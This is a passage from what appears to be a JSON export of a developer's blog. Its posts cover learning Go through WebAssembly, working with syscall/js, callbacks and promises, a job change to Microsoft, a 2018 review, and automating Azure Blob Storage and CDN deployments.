and that is rather unpleasant because you shouldn’t pollute window/global/self.\nI decided that I wanted my loader to address this and to also make this a little easier to work with from Go, removing the need to understand the JavaScript callback pattern.\nSo the loader’s GitHub repository also contains a Go package called gobridge which gives you helpers to register functions and values in Go to JavaScript.\nThis means I can write some code like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 //+ build js,wasm package main import ( "strconv" "syscall/js" "github.com/aaronpowell/webpack-golang-wasm-async-loader/gobridge" ) func add(this js.Value, args []js.Value) (interface{}, error) { ret := 0 for _, item := range args { val, _ := strconv.Atoi(item.String()) ret += val } return ret, nil } func main() { c := make(chan struct{}, 0) println("Web Assembly is ready") gobridge.RegisterCallback("add", add) <-c } And use gobridge.RegisterCallback and not worry about working with js.FuncOf or where to register it in the JavaScript object graph.\nAnd that latter part is important because I don’t want to dump everything on global, I want to namespace it.\nLet’s update the JavaScript we’re generating in the Loader to include this:\n1 2 3 4 5 6 7 const g = self || window || global if (!g.__gobridge__) { g.__gobridge__ = {}; } const bridge = g.__gobridge__; Now our Go code can use that via the gobridge, and we don’t have to worry about trashing anything on window in the browser!\n", "id": "2019-02-08-golang-wasm-5-compiling-with-webpack" }, { "title": "Learning Golang through WebAssembly - Part 4, Sending a Response to JavaScript", "url": "https://www.aaron-powell.com/posts/2019-02-07-golang-wasm-4-response-to-javascript/", "date": "Thu, 07 Feb 2019 09:11:22 +1100", "tags": [ "golang", "wasm", "javascript" ], "description": "We've learnt how to write to the DOM, but how about returning values to JavaScript functions?", "content": "Returning to JavaScript We’ve learnt how we can use syscall/js to create and manipulate DOM elements from our Go functions, but what if we want to treat Go like a library and execute a function to get a value back? Maybe we have an image processing library we want to use that was written in Go, or we want to use some functionality that our core business application has in it.\nMy first thought was to create a function that returns a value:\n1 2 3 4 5 func printMessage(inputs []js.Value) string { message := inputs[0].String() return "Did you say " + message } And immediately we hit an error because js.FuncOf takes a signature of func(args []js.Value), meaning it takes a function that doesn’t return anything, a void function (if you were to C# it).\nRight, back to the drawing board.\nCallback Time! As JavaScript developers we are very used to things being executed asynchronously, or at least implied async, and we’ve always done this with a callback pattern.\nIn Node.js this is really prevalent:\n1 2 3 4 const fs = require('fs'); fs.readFile('/path/to/file.txt', (err, data) => { // do stuff }); We pass a function as the last argument that takes two arguments, an error object and the output of the function executing successfully. We’d then test if err contained anything, throw if it does, continue if it doesn’t.\nThis then got me thinking, would it be so bad to implement that as a pattern when it comes to talking to Go?
It seems logical, because we’re shelling out to another runtime, we shouldn’t have to wait for it to complete before we continue on in our application, we should treat it like an async operation.\nPreparing Go for callbacks Let’s start updating our Go code to handle the idea of this callback pattern. Since we’re given an array of js.Value we’ll have to make an assumption about where the callback lives in that array. I’m going to follow how Node.js has done it and make an assumption that the last argument passed in was the callback function.\n1 2 3 4 func printMessage(inputs []js.Value) { callback := inputs[len(inputs)-1:][0] // todo } This is the same as doing const callback = inputs.slice(inputs.length - 1) in JavaScript, we’re using the len Go function to take a subset of the array from the last item to the end (which will always be 1 item) and then grabbing that single value (since we get an array of length 1 and just need the value). Alternatively, you could write inputs[len(inputs)-1], but I’m just experimenting with Go syntax and trying to learn what things do.\nYou might want to do a Value.Type test against callback to make sure it is a JavaScript function and then fail if it isn’t, but I’m going to omit error handling for now.\nNow that we have a js.Value that represents our JavaScript callback we can call it using Value.Invoke, which is like Value.Call that we saw in the last post but for use when you have a value that is a function, not an object that has a function.\nBecause I’m using the err/data style with the callback I’ll pass null when there isn’t an error (you could also pass undefined, pick your poison).\nThis results in our Go function looking like so:\n1 2 3 4 5 6 func printMessage(inputs []js.Value) { callback := inputs[len(inputs)-1:][0] message := inputs[0].String() callback.Invoke(js.Null(), "Did you say " + message) } Updating our JavaScript With our Go code updated it’s time to improve how we call it from JavaScript:\n1 2 3 4 5 6 7 8 printMessage('JS calling Go and back again!', (err, message) => { if (err) { console.error(err); return; } console.log(message); }); Obviously I’m going pretty simplistic here and just writing a message to the console but you could be pushing that into a DOM element you create via JavaScript, it could be sent as a fetch request, or do anything else that you might want to do from a JavaScript application.\nConclusion We’ve now seen how we can really break down the barriers between Go and JavaScript and start treating Go functions just like any other function we might use in a JavaScript application, whether they have come from another JavaScript module, the browser or the runtime.\nTreating it like an async operation and using the callback pattern really makes it feel like just any old piece of JavaScript that you might be working with. It does become a bit cumbersome in the Go side of things, but so far that’s been my experience with Go’s approach to WebAssembly, it’s either all in on Go or no Go (zing!).\nBonus - Promisifying Go The callback pattern is fine, but it can lead to callback hell. 
It also means we can’t use the sexy new async/await keywords.\nLet’s just wrap it with a Promise!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 function printMessagePromise(msg) { return new Promise((resolve, reject) => { printMessage(msg, (err, message) => { if (err) { reject(err); return; } resolve(message); }); }); } async function doStuff() { let msg = await printMessagePromise('JS calling Go and back again!'); console.log(msg); } doStuff(); Alternatively you could pass in the resolve and reject callbacks and then Go makes a decision in which to invoke, but I prefer the callback pattern as it introduces less decision trees in the Go codebase.\n", "id": "2019-02-07-golang-wasm-4-response-to-javascript" }, { "title": "Learning Golang through WebAssembly - Part 3, Interacting with JavaScript from Go", "url": "https://www.aaron-powell.com/posts/2019-02-06-golang-wasm-3-interacting-with-js-from-go/", "date": "Wed, 06 Feb 2019 09:00:07 +1100", "tags": [ "golang", "wasm", "javascript" ], "description": "Looking at interop between Go and JavaScript via WASM", "content": "Runtime interop In the last post we wrote our first bit of Go and used it to write a message out to the dev tools console, which is useful in terms of proving that something worked, but not really useful for an end user. For that we really need to do something that allows the JavaScript and WASM runtimes to talk to each other.\nFor this we’re going to use a package called syscall/js which is part of Go 1.11 and provides us with some basic functions to undertake interop.\nAnd this is where we start seeing that Go’s approach to WASM is quite different to other languages.\nUnderstanding syscall/js Before we dive into anything too deep I want to look a bit at syscall/js so we know how it works.\nAs you’ll see from the API docs that this is a very small package exposing a very small set of features. The most important thing that is exposed from the package is the type Value which is how Go represents data getting passed in from the JavaScript runtime, and how we request things in Go from the JavaScript runtime. This is kind of a dynamic type because it could be an int or a string or a function or an object, it really depends on how you use it, which does make it a little bit clunky to use.\nWriting to the DOM The first thing you might want to do is move away from writing to the console and instead write to the DOM.\nSite note: We’ll use raw syscall/js but if you’re doing serious DOM manipulation you might want to look at something like dennwc/dom which is a wrapper syscall/js and gives a nicer interface.\nLet’s create an element and then write a message to it before adding it to the DOM.\n1 2 3 4 5 6 func main() { document := js.Global().Get("document") p := document.Call("createElement", "p") p.Set("innerHTML", "Hello WASM from Go!") document.Get("body").Call("appendChild", p) } Compile this like we did in the last post and fire up your application to now see that you have a new element in the DOM with a message, rather than something in the console.\nLet’s break it down, first we’ve got js.Global(), this is a call to access the JavaScript global object, window or self, depending if it’s browser or node. 
This returns you a js.Value object that, through the magic of the Go runtime, will be the right thing.\nI’m then using the Value.Get function to access a property of the global object, document and then using the shorthand assignment := assigning that to a Go variable called document.\nSince document is of type js.Value we can then interact with it, and in-tern interact with the DOM, so I can use Value.Call to invoke a function of the object, createElement, passing in any arguments, "p" which returns the result as a js.Value, which in this case is the newly created DOM element, winding up in p.\nOn our new DOM element we can call Value.Set which will assign a property of the object, innerHTML to our message.\nFinally, we use Get to access body (from document) and Call the function appendChild, giving it p so our new element appears in the DOM as we would expect.\nPhew! See what I mean by it being a bit cumbersome? This is why I’d expect if you’re really getting serious about DOM interactions from Go that you’ll use a wrapper package or write your to fit your needs.\nCalling Go from JavaScript We’ve looked at going from Go to JavaScript but what if we want to go the other way and call into Go from JavaScript? After all, that’s one of the big draw cards of WASM, compiling a native module that would be overly complex to reproduce in JavaScript, but then using it from JavaScript just like any other function.\nAnd here is where we find the biggest problem I have with Go’s approach to WASM relative to the others (C/C++/Rust). Let’s say I want to do this:\n1 2 3 const el = document.createElement('p'); el.innerHTML = goRuntime.someFunction("hello"); document.body.appendChild('el'); We’re wanting to invoke a function, someFunction on the Go/WASM runtime from JavaScript. Ignoring the trivial nature of the code, this is the kind of thing that you’d want to do.\nNow in an ideal world of WASM we would get some exports provided to us (see the A Quick WebAssembly Primer of the last post), but Go doesn’t work that way, that’s not how we export functions. Instead we have to register them with the browser using Set and a FuncOf:\n1 js.Global().Set("someFunction", js.FuncOf(someFunction)) This will then create a global function called someFunction that you can invoke from JavaScript. Now it doesn’t have to be a global function, you could use js.Global().Get(...) and nest a bunch of Get’s to “namespace” your function, but you’d need to ensure that object exists in JavaScript first.\nI find this quite ugly as it really feels like you’re violating the encapsulation of WASM by not using the instance.exports that you should when you startup WASM.\nCreating a callable function Complaining aside, let’s get back to our example. Rather than hard-coding a message, let’s allow you to send it from JavaScript. We’ll create a new function for this and register the callback.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 package main import ( "syscall/js" ) func printMessage(this js.Value, inputs []js.Value) interface{} { message := inputs[0].String() document := js.Global().Get("document") p := document.Call("createElement", "p") p.Set("innerHTML", message) document.Get("body").Call("appendChild", p) } func main() { js.Global().Set("printMessage", js.FuncOf(printMessage)) } The main addition to this is the printMessage function, it takes an array of js.Value for arguments and doesn’t return a value.\nBut why does it take an array? 
Well apart from the fact that js.FuncOf requires it to, it’s because JavaScript can have as many arguments provided to a function as you like, you just name the ones you care about and handle the magic arguments (or define a spread) if you want more. And also, JavaScript has a pretty weak type system compared to Go, so while you might want a string there’s nothing stopping the caller passing in a number or a function, so Go forces you to use this boxed struct in js.Value and then you can unpack it as required using Value.String or Value.Int or whatever type you want.\nNow compile it, launch a browser, open the dev tools, call your globally declared function and you’ll get this error message:\nprintMessage("") wasm_exec.js:378 Uncaught Error: bad callback: Go program has already exited at global.Go._resolveCallbackPromise (wasm_exec.js:378) at wasm_exec.js:394 at <anonymous>:1:1 sad trombone\nGo + WASM is an Application, not a Library If you’ve done much reading on WASM then you’ll see that it’s intended to be treated like a library that you call out to, you use it to encapsulate functionality that would be hard to convert from C/C++/Rust to JavaScript, so you just load that native library and invoke the functions it exports.\nGo takes a different approach, Go treats this as an application, meaning that you start a Go runtime, it runs, then exits and you can’t interact with it. This, coincidentally, is the error message that you’re seeing, our Go application has completed and cleaned up.\nTo me this feels more closer to the .NET Console Application than it does to a web application. A web application doesn’t really end, at least, not in the same manner as a process.\nAnd this leads us to a problem, if we want to be able to call stuff, but the runtime want to shut down, what do we do?\nIntroducing Channels Basically we want to tell Go that we don’t want it to exit until we tell it that we want it to exit and the easiest way to do this is with a channel.\nA channel is something that waits for data to be sent into it and will pause the execution until it receives data on it.\nFirst off we’ll make the channel by adding this line into our main function:\n1 c := make(chan bool) We’re using the built-in make function, specifying the chan keyword with the type of data that we expect over the channel. The type is somewhat arbitrary since we’re never planning to push data over the channel, I just chose bool for fun.\nNow we need to tell the application to wait for the channel to receive data, we do this by adding this line where we want execution to pause:\n1 <-c This would make a main function look like so:\n1 2 3 4 5 func main() { c := make(chan bool) js.Global().Set("printMessage", js.FuncOf(printMessage)) <-c } Now if you build and run your application you can execute the printMessage function as many times as you like from the console!\nAs an aside, you can use channels for a lot more than stopping the application from quitting, such as combining channels with goroutines but they are beyond the scope of what I’m covering at this point.\nBonus - Using Channels to Kill You App We’re using a channel to “hold” out application open, but what if you did want to terminate it? 
Maybe there’s a scenario where you want to cleanup your WASM application, or maybe it’s only intended to be used for a short period of time before being shutdown?\nWell we can leverage the channel for that.\nHere’s a slightly modified version of the demo code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 package main import ( "syscall/js" ) var c chan bool func init() { c = make(chan bool) } func printMessage(this js.Value, inputs []js.Value) interface{} { message := inputs[0].String() document := js.Global().Get("document") p := document.Call("createElement", "p") p.Set("innerHTML", message) document.Get("body").Call("appendChild", p) c <- true } func main() { js.Global().Set("printMessage", js.FuncOf(printMessage)) <-c println("We are out of here") } First thing you’ll notice is that I’ve defined the channel as a package-scoped variable with var c chan bool. This makes it available throughout this package, not just on the stack of the main function.\nNext I’ve introduced a function called init. We haven’t talked about init yet, but init is a special function that is called, if it exists, before the main function, allowing us to setup stuff that might need to be setup. Here I’m using it to setup the channel that we’re using.\nOur main function still waits for our channel to receive data, and after it does it’ll print out a message to the console. But what you will also notice is that inside printMessage I do push data over the channel on the last line I do:\n1 c <- true This puts the value true into the channel, which then flows through to the main function and since we’re not really doing anything on receive it just continues through, prints a message, and our application is done.\nPretty cool how you can control execution flow here with the channel.\nConclusion Today we looked at how we can start interacting with the DOM from our Go WASM application and then how we can get JavaScript to interact with WASM. Sure, much of how we did our interaction was via the dev tools to invoke the printMessage function we’re defining, but you can see how we might be able to make it a bit smarter and bind that to an event on the page instead.\nWe’ve also seen one of the painful parts of Go’s approach to WASM, that it’s treated like an application not a library, and that we have to do something that feels a little dirty to ensure it is always available within our JavaScript application. 
This does feel like a design choice of Go on how to leverage WASM, but it still is quite jarring when you compare it to the rest of the WASM information you’ll find on the web.\n", "id": "2019-02-06-golang-wasm-3-interacting-with-js-from-go" }, { "title": "Learning Golang through WebAssembly - Part 2, Writing your first piece of Go", "url": "https://www.aaron-powell.com/posts/2019-02-05-golang-wasm-2-writing-go/", "date": "Tue, 05 Feb 2019 09:00:56 +1100", "tags": [ "golang", "wasm", "javascript" ], "description": "Writing your first piece of Go to combine with WASM", "content": "Hello WASM, Go style You’ve got your Golang dev environment setup and now it’s time to put it to good use.\nWe’re going to start really basic and write what amounts to a Hello World code:\n1 2 3 4 5 6 7 package main import "fmt" func main() { fmt.Println("Hello WASM from Go!") } Well… that’s not particularly exciting, but let’s break it down to understand just what we’re doing here (after all, I’m expecting this might be your first time looking at Go).\n1 package main Here’s how we initialise our Go application, we define a main package which becomes our entry point. This is what the Go runtime will look for when it starts up so it knows where the beginning is. Think of it like class Program in C# for a console application.\nSide note: I just said “our Go application”, and that’s something that you need to think differently about with Go + WASM, we’re not just writing a bunch of random files that we talk to from the browser, we’re building an application that we compile specifically to run in the WASM virtual machine. This will make a bit more sense as we go along.\n1 import "fmt" This is how Go brings in external packages that we want to work with. In this case I’m pulling in the fmt package from Go’s standard library that gives us something to work with later on. It’s like open System in F#, using System in C#, or import foo from 'bar'; in JavaScript.\nLike F# & C# we only open a package, we don’t assign the exports of the package local variable if we don’t want to. If we wanted to import multiple packages we can either have multiple import statements or write something like this:\n1 2 3 4 import ( "fmt" "strconv" ) Side note: We’re not ready to get too complex with packages, but if you want to know more check out this article.\nFinally we create a function:\n1 2 3 func main() { fmt.Println("Hello WASM from Go!") } We’ve named our function main and given it no arguments, which is important, because this is the entry point function in our main package that the Go runtime looks for. Again, it’s like static void Main(string[] args) in a C# console application.\nNext we’re using the fmt package we imported and the public member of it Println to… print a string to standard out.\nRun Go, Run! It’s time to test our code, we’ll use the go run command for that:\n1 2 ~/tmp> go run main.go Hello WASM from Go! Yay we’ve created and run some Go code, but we’ve run it on a command line, not in a browser, and after all, we’re trying to make WASM, and for that we can’t use go run, we’ll need go build. But if we were to just straight up run go build it will output a binary file for the OS/architecture you are currently working with, which is OK if you’re building an application to run on a device, but not for creating WASM binaries. 
For that we need to override the OS and architecture that we’re compiling for.\nBuilding Go for WASM Conveniently Go allows you to specify environment variables to override system defaults, and for that we need to set GOOS=js and GOARCH=wasm to specify that the target OS is JavaScript and the architecture is WASM.\n1 ~/tmp> GOOS=js GOARCH=wasm go build -o main.wasm main.go And now we’ll have a file main.wasm that lives in the directory we output to.\nBut how do we use it?\nA Quick WebAssembly Primer For over 20 years we’ve had JavaScript in the browser as a way to run code on the web. WASM isn’t meant to be a replacement for JavaScript, in fact you’re really hard pressed to use it without writing (or at least executing) a little bit of JavaScript.\nThis is because WebAssembly introduces a whole new virtual machine into the browser, something that has a very different paradigm to JavaScript and is a lot more isolated from the browser, and importantly user space. WebAssembly executed pre-compiled code and is not dynamic like JavaScript in the way it can run.\nSide note: There are some really great docs on MDN that covers WebAssembly, how it works, how to compile C/C++/Rust to WASM, the WebAssembly Text Format and all that stuff. If you really want to understand WASM have a read through that, in particular the WebAssembly Text Format is very good at explaining how it works.\nSo before we can use our WASM binary we need to create a WASM module and instantiate the runtime space that WASM will run within.\nTo do this we need to get the binary and instantiate it with WASM. MDN covers this in detail but you can do it either synchronously or asynchronously. We’ll stick with async for our approach as it seems to be the recommended way going forward.\nAnd the code will look like this:\n1 2 3 4 5 6 async function bootWebAssembly() { let imports = {}; let result = await WebAssembly.instantiateStreaming(fetch('/path/to/file.wasm'), imports); result.instance.exports.doStuff(); } bootWebAssembly(); Don’t worry about the imports piece yet, we’ll cover that in our next chapter.\nWe’ve used fetch to download the raw bytes of our WASM file which is passed to WebAssembly and it will create your runtime space. 
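(A hedged aside that isn’t in the original post: instantiateStreaming requires the response to be served with the application/wasm content type — something that comes up again when we host the files — and if that isn’t possible, the non-streaming WebAssembly.instantiate over an ArrayBuffer achieves the same result. A minimal sketch, reusing the made-up doStuff export from above:)
async function bootWebAssemblyFallback() {
  let imports = {};
  // Download the bytes ourselves, then hand them to the non-streaming API.
  let response = await fetch('/path/to/file.wasm');
  let bytes = await response.arrayBuffer();
  let result = await WebAssembly.instantiate(bytes, imports);
  result.instance.exports.doStuff();
}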
This then gives us an object that has an instance (the runtime instance) that exports functions from our WebAssembly code (C/C++/Rust/etc).\nAt least, this is how works in an ideal world, it seems that Go’s approach is a little different.\nBooting our Go WASM output Now that we understand how to setup WebAssembly let’s get our Go application going.\nAs I mentioned Go is a little different to the example above and that’s because Go is more about running an application than creating some arbitrary code in another language that we can execute from JavaScript.\nInstead with Go we have a bit of a runtime wrapper that ships with Go 1.11+ called wasm_exec.js and you’ll find it in:\n1 ~/tmp> ls $"(go env GOROOT)/misc/wasm/wasm_exec.js" Copy this file into the folder with you main.wasm, we’re going to need it.\nNext we’ll create a webpage to run the JavaScript:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <html> <head> <meta charset="utf-8"> <script src="wasm_exec.js"></script> <script> async function init() { const go = new Go(); let result = await WebAssembly.instantiateStreaming(fetch("main.wasm"), go.importObject) go.run(result.instance); } init(); </script> </head> <body></body> </html> Finally we’ll host the code somewhere, you can use any webserver that you want, goexec, http-server, IIS, etc.\nNote: Make sure your server supports the WASM mime type of application/wasm.\nFire it up, launch the browser and open the dev tools, now you should see the result of fmt.Println there! Woo! Did you guess that we’d see it in the console? I bet you did, after all, that’s the thing most akin to standard out in the browser!\nGo’s WASM Runtime As you’ll see in the little HTML snippet above the was we start WASM for Go is a little different, first we create a Go runtime with new Go(), which is provided to us by wasm_exec.js.\nThis then provides us with an importObject to pass to the instantiateStreaming function and the result we get back we pass back to the runtimes run method.\nThis is because Go does a bit of funky stuff to treat the WASM binary as an application rather than arbitrary functions like others do. Over the rest of this series we’ll explore this a bit more too.\nConclusion There you have it folks, we’ve created our first bit of WASM code using Go, created some browser assets, executed it in the browser and seen an output message.\nWe’ve also learnt a little bit about how WASM works and how it’s isolated from the JavaScript environment, and what makes the approach with Go a little different to other WASM examples you’ll find on the web.\nBut our application is isolated, tune in next time and we’ll start looking at how to interact with JavaScript from WASM.\n", "id": "2019-02-05-golang-wasm-2-writing-go" }, { "title": "Learning Golang through WebAssembly - Part 1, Introduction and setup", "url": "https://www.aaron-powell.com/posts/2019-02-04-golang-wasm-1-introduction/", "date": "Mon, 04 Feb 2019 09:00:00 +1100", "tags": [ "golang", "wasm", "javascript" ], "description": "Introducing a new series on learning Go by writing WebAssembly", "content": "Introduction I’ve always liked tinkering with different technology and trying to stay abreast of things that look interesting. One thing that’s been on my radar for a while now is Go, aka Golang, but as someone who predominately does web development in the browser I was never quite sure where Go could fit into what I tend to build.\nAnother thing that I’d been meaning to pick up is Web Assembly, aka WASM, but again I’ve never quite had the time to pick it up. 
If you’re not familiar with WASM, it’s a new component of the web platform to allow developers to use high level languages like C, C++, Rust, Go, .NET, etc. in the browser in a native way, rather than converted to JavaScript. I’m by no means a WASM expert, but after a week of digging into things I’ve found some really interesting tidbits I’ll share along the way.\nAs I recently started a new Developer Relations job I decided that now was the perfect time for me to start exploring these technologies.\nAnd as it so happens Go’s 1.11 release last year includes experimental WASM support, so it looks like it’s meant to be.\nSo I have decided to put together a series that looks at the experience of using Go, learning WASM and how it all fits into the tool chain that we tend to use as web developers.\nWe won’t build anything particularly complex, the Go support is experimental at best, but it should give you enough of a starting point to work out where to go next.\nGetting Setup The first thing you’ll need to do is to setup a development environment. Go works on all major operating systems and I’ve used Windows + Windows Subsystem for Linux (WSL). My colleague Scott Coulton has written how to setup a WSL dev environment, including Go that I followed.\nOne thing I will note is that I haven’t managed to get code completion working in VSCode at the moment, something seems incorrect in the way I’ve setup my GOPATH and GOROOT, but so far it hasn’t been too painful for me to work without code completion. Once I got my GOPATH and GOROOT set properly and defined as environment variables in both Windows and Linux (WSL) it worked fine.\nGOPATH, GOROOT, huh? This is something that confused the heck out of me initially when I was getting setup, what these two things are and what do they do.\nBy default when installing on Windows Go will want to install into C:\\Go. I am not really a fan of this, there should be 3 things at the C:\\ level, Program Files (including the x86 folder), Users and Windows (now in reality you’ll have a few more things but they are all system-level things) so I wanted to change it. As a result of setting up Docker + WSL I already had a Go folder at C:\\Users\\<me>\\go and figured that’d be a good place to install Go into.\nAnd this is where things starting going wrong. Because of this I had both my GOPATH and GOROOT pointing to the same folder, which seemed logical to me, after all, that’s where Go was.\nNope, the Go commands kept throwing errors at me and this is because these two paths can’t be combined. The reason for this is that they represent two different concepts within Go:\nGOROOT - this is where Go is installed and where all of the Go system components are installed to. I use C:\\Users\\<me>\\goroot for that GOPATH - this is Go’s user space, where packages you pull down end up (such as goexec which we’ll use in the next article). I use C:\\Users\\<me>\\go for that So if you were to combine them you’d run the potential of trashing the “core” of Go.\nEditors and Browsers I use VS Code as my text editor and it has some great plugins for working with Go, but you can use whatever you would like.\nAs for browsers, well WASM is still pretty new so you’ll want an evergreen to make it work. I did have some problems with Edge so I tended to stick to Chrome and Firefox, but with Edge moving to Chromium shortly I see that problem going away. 
I have also been told that the demo we’ll build doesn’t seem to work on iOS Safari or Chrome Android, but I think that might be related to this issue, so stick to a desktop browser (also, you get dev tools there).\nWe will need Node.js eventually, but not first up, so go ahead and install it (I uses the latest v11 release) if you don’t already have Node.\nConclusion Ultimately this was pretty short post to set the stage for what we’re about to undertake.\nDon’t worry if you’ve never written a line of Go, or you’ve never heard of WebAssembly, we’ll take this journey together.\n", "id": "2019-02-04-golang-wasm-1-introduction" }, { "title": "Starting 2019 with a new job", "url": "https://www.aaron-powell.com/posts/2019-01-14-starting-2019-with-a-new-job/", "date": "Mon, 14 Jan 2019 09:45:47 +1100", "tags": [ "career", "readify", "microsoft" ], "description": "I've left Readify and completed my first week at Microsoft!", "content": "In my 2018 year in review I mentioned that I wrapped up 2018 by wrapping up at Readify and in January this year I started at Microsoft as a Cloud Developer Advocate.\nI’ve blogged about the journey I took at Readify as I moved through the consulting team and into the sales team. But after 8 years, 3 months and 2 days I left Readify for the last time (as an employee).\nWhy now? I’ve been asked this a few times by people since I started telling them I was leaving and naturally I point them to this YouTube clip to sum it up:\nJust kidding!\nIt actually comes down to two main reasons, a great opportunity and a lot of the same reasons I joined Readify initially.\nLeaving Readify This was a really tough decision, Readify had been my home for so long now, over double my next longest employer, so the idea of not being part of the Readify family was quite daunting.\nBut I knew that my time in the Pre-Sales role was coming to an end. I was on a 12 month secondment, so it was never a permanent thing, but that meant that I would have to work out what else I wanted to do.\nThis lead me to a cross-roads, I wanted to do one of two things, either take on a bigger challenge of technical strategy (leading the strategy for a business, department head, CTO, etc.) or go back to my roots and get technical.\nThrough the acquisition in Telstra the opportunity to tackle the former was very much there and I was looking at some options there, but at the same time I was talking to Microsoft about the CDA role. Over the course of a few months my wife and I had many discussions on this and I changed my mind maybe a hundred times on what I wanted to do next. In the end it came down to a single decision.\nNot letting an opportunity pass me by A few years ago I was approached by a friend in a product group at Microsoft to apply for a role. It was on a product I am passionate about so it would have been a very good fit. But it was bad timing, my wife and I had recently had a personal tragedy that made us shift some of our priorities and meant we weren’t in a position to relocate to the US, which the role required.\nAs the years have gone by, while I don’t regret the decision, I have often wondered “what if…”. And that was a key driver this time around, I didn’t want to look back in a few more years and think “what if…”.\nIn the end this played a large factor on my decision to move on from Readify. 
I really enjoyed my time at Readify, it’s a great place to work, I learned so much during my time there and would recommend it highly as a place to work for someone who’s wanting to work in consulting or wants to work with some amazing people. I’m sad I won’t get to watch the evolution of Readify from the inside, the next few years do look pretty exciting, but I don’t want to look at this opportunity in Microsoft and say “what if…”.\nSo what’s next? Wondering what I'm doing at Microsoft? I've joined the @azureadvocates Developer Relations team here in Australia.\nIf you run a community, startup or are a student looking for support, reach out 😁 https://t.co/ocDjA57JFC\n— Aaron Powell (@slace) January 7, 2019 I’m part of the Cloud Advocate team at Microsoft, I’ve joined as a Regional Cloud Developer Advocate, focusing on the Australian (and in particular Sydney) IT communities. What does mean in practice? Well I’m still figuring that out, I’m only 1 week in so it’ll take a bit of time 😝. But you’ll likely see a lot more of my online and around the communities here, so if you’re an event organiser I’d love to talk to you!\n", "id": "2019-01-14-starting-2019-with-a-new-job" }, { "title": "2018 - A year in review", "url": "https://www.aaron-powell.com/posts/2019-01-08-2018-a-year-in-review/", "date": "Tue, 08 Jan 2019 09:35:09 +1100", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "With another year done it time to get going on my year in review post. This year I’ve actually managed to get it done a full 3 days earlier than 2017’s!\n2018 was a pretty quiet year for me on the blogging front, with only 11 posts (including a ‘year in review’ one), and most of them were meta-posts about blogging or how I run websites. This reflects in my traffic stats, there was a drop in traffic over 2018 vs 2017. But this year was less about blogging and instead it was quite a big year for me both personally and professionally.\nGetting Personal I’ll start with the personal side of what made 2018 big, and that was that my wife and I welcomed our 2nd child in March. Unfortunately it wasn’t as smooth sailing as we had hoped, with him spending the first 8 days of his life in the neonatal intensive care unit (NICU) at our hospital. He was born just a touch earlier than planned and he had some trouble breathing which resulted in his stay in NICU.\nWhile he was only in there for a short period of time, relative to what most people there experience, it’s really tough to bring your wife home but not your newborn too. But we were lucky that he recovered quickly and now, 10 months on, you wouldn’t have any idea that he’d had any issues.\nUltimately being a dad of 2 had meant that I had a lot less free time to dedicate to all my other ventures and thus the blogging took a bit of a hit.\nBeing Professional Throughout 2018 I continued with my secondment to the Readify sales team. 
Being ‘off the tools’ did mean that I was having to invest a bit more time out of hours to stay up to date, or take more targeted PD when I wanted to learn something.\nI used this as a chance to really brush up on Azure, got myself a MCSA so apparently I know all about the Azure!\nSpeaking While I might have been keeping things a bit low-key on the blogging front I had a fairly hectic year speaking, over the course of 2018 I spoke at:\nuduf NDC Security NDC Oslo DDD Perth DDD Sydney (well, I MC’ed it 😛) DDD Melbourne NDC Sydney (workshop + talk) ALT.NET Sydney I’m pretty stoked at how many events I got to speak at this past year and I’m starting to prepare for the events I want to get to this year. Hopefully I can get a few more in 2019 😉.\nEnding an Era And this brings us to the big event of 2018, I left Readify to join Microsoft. I’ll do a separate post about that shortly but in summary it was a hard decision to make, Readify’s been my home for over 8 years, double my next longest stint anywhere, but my role at Microsoft was an opportunity I just couldn’t pass up.\nSo on to 2019, a new job at a new company and hopefully an exciting year to come!\n", "id": "2019-01-08-2018-a-year-in-review" }, { "title": "Automating Deployments for DDD Sydney", "url": "https://www.aaron-powell.com/posts/2018-07-05-automating-deployments-for-dddsydney/", "date": "Thu, 05 Jul 2018 10:43:52 +0200", "tags": [ "azure", "dddsydney" ], "description": "How we automate deployments of DDD Sydney's static websites", "content": "In my last post about Cutting Azure Costs for DDD Sydney I talked about how we now use static websites for the main DDD Sydney assets.\nToday I want to talk about how we deploy those, and importantly, how we work with Azure CDN for it. I’m not going to talk about how we do the build phase of the websites, because that’s going to be different depending on what you’re using to generate your static website (for example, we use next.js for the main website and hugo for the blog), instead I’ll focus on what you do with that pile of HTML, CSS, JavaScript and other web assets.\nDeploying to Blob Storage The first thing you’ll need to do is get your assets into Blob Storage, since that’s where they are served from. We’re using VSTS for this as it links to our O365 so it’s all federated auth (minimal accounts ftw!) and we just use the Azure File Copy task (v1) and well… that’s all really, job done, all go home!\nWell, not quite.\nDon’t forget to set the content type When you copy a file into Blob Storage it will automatically be assigned a generic mime type, and when served to the browser it’ll be served wrong and won’t render.\nThis is easily fixed by adding /SetContentType to the Additional Arguments property on the VSTS task (well, to azcopy under the hood).\nClean deployments or overriding deployments? We’re essentially using Blob Storage as a place to dump a bunch of files and then in Azure CDN we put a pretty URL in front of it. So when we do a deployment of changes, new posts to the blog, new/changed content of the website, etc. 
we needed to decide if we’re put them into the same folder as all other deployments or whether we’d dump them into a new container.\nI decided to go for the later, to do a clean deployment every single time into a new location each time, using the Blob Prefix property of the VSTS task being set to $(Release.ReleaseId).\nThis means that each release we do is kept separate from all previous releases and if something is broken we can always roll back a release!\nUpdating the CDN Great, your files are up in Blob Storage, they are in a new folder to the previous ones, so now it’s time make the CDN respect that. After all, the point of a CDN is that you rarely hit the underlying site, you serve it from cache.\nFor this I need to update the Origin Path of the CDN endpoint.\nThe what?\nWhen you’re using Azure CDN you create an Endpoint that provides the content to the CDN. Because we’re using Storage as our Origin type we can specify an Origin Path, which is the place within Storage that our files live. Now each release we change this path by appending a new release number, so we need to update that in Azure.\nFor this we use the Azure CLI VSTS task (v1) and run this command:\n1 az cdn endpoint update -n <name of your endpoint> --origin-path /<container name>/$(Release.ReleaseId) --profile-name <azure cdn name> -g <resource group name> The actual one we use for DDD Sydney’s blog is:\n1 az cdn endpoint update -n blog-dddsydney --origin-path /website/$(Release.ReleaseId) --profile-name dddsydney-blog-cdn -g blog Removing the old content The last piece of the puzzle is that we need to tell Azure CDN to refresh, just because we’ve changed the underlying origin doesn’t mean that we’re serving new content, it’s still cached after all!\nThis is done by running a purge on the CDN and again is done 